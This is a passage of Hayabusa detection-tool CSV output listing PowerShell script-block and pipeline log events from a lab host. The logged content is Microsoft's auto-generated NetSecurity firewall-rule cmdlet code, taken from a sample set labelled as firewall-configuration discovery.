$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_m,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.661 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ethodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { 
[object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 
'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.661 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.661 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" 
ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Show-NetFirewallRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process 
{ try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Dependents'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallRule { 
[CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] 
[ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, 
ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] 